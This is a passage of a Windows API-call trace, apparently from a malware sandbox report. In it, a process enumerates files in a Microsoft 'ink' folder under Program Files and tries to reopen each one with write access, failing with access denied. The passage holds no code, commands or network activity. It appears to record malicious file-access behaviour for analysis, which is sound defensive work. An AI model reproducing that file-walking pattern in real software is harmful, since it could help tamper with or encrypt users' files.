shared\\ink\\fsdefinitions\\oskpred", lpUsedDefaultChar=0x0) returned 73 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.624] AreFileApisANSI () returned 1 [0099.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x84fe0 [0099.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 73 [0099.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.624] GetLastError () returned 0x5 [0099.624] GetLastError () returned 0x5 [0099.624] SetLastError (dwErrCode=0x5) [0099.624] GetLastError () returned 0x5 [0099.624] SetLastError (dwErrCode=0x5) [0099.624] GetLastError () returned 0x5 [0099.624] SetLastError (dwErrCode=0x5) [0099.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0099.624] AreFileApisANSI () returned 1 [0099.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0099.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0099.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 73 [0099.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.624] GetLastError () returned 0x5 [0099.624] GetLastError () returned 0x5 [0099.624] SetLastError (dwErrCode=0x5) [0099.624] GetLastError () returned 0x5 [0099.624] SetLastError (dwErrCode=0x5) [0099.624] GetLastError () returned 0x5 [0099.624] SetLastError (dwErrCode=0x5) [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0099.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.625] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0099.626] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0099.626] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cef41, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.626] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0x0, dwReserved1=0x0, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 1 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xee) returned 0x4b1c8 [0099.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0099.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4b1c8 | out: hHeap=0x20000) returned 1 [0099.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.627] AreFileApisANSI () returned 1 [0099.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", lpUsedDefaultChar=0x0) returned 89 [0099.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0099.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.627] AreFileApisANSI () returned 1 [0099.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0099.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0099.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 89 [0099.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.627] GetFileType (hFile=0x27c) returned 0x1 [0099.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.628] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.628] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.628] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.628] CloseHandle (hObject=0x27c) returned 1 [0099.628] AreFileApisANSI () returned 1 [0099.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0099.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0099.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 89 [0099.628] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.628] GetLastError () returned 0x5 [0099.628] GetLastError () returned 0x5 [0099.629] SetLastError (dwErrCode=0x5) [0099.629] GetLastError () returned 0x5 [0099.629] SetLastError (dwErrCode=0x5) [0099.629] GetLastError () returned 0x5 [0099.629] SetLastError (dwErrCode=0x5) [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0099.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.629] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0xb0, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x5a6c0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0xb0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧Μ")) returned 0 [0099.629] FindClose (in: hFindFile=0x78150 | out: hFindFile=0x78150) returned 1 [0099.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0099.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.630] AreFileApisANSI () returned 1 [0099.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml", lpUsedDefaultChar=0x0) returned 77 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0099.630] AreFileApisANSI () returned 1 [0099.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c7a0 [0099.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 77 [0099.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0099.631] GetFileType (hFile=0x418) returned 0x1 [0099.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.631] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.631] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.631] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.631] CloseHandle (hObject=0x418) returned 1 [0099.632] AreFileApisANSI () returned 1 [0099.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0099.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0099.632] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8d0d0, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 77 [0099.632] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.632] GetLastError () returned 0x5 [0099.632] GetLastError () returned 0x5 [0099.632] SetLastError (dwErrCode=0x5) [0099.632] GetLastError () returned 0x5 [0099.632] SetLastError (dwErrCode=0x5) [0099.632] GetLastError () returned 0x5 [0099.632] SetLastError (dwErrCode=0x5) [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0099.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.632] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06cf371, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, 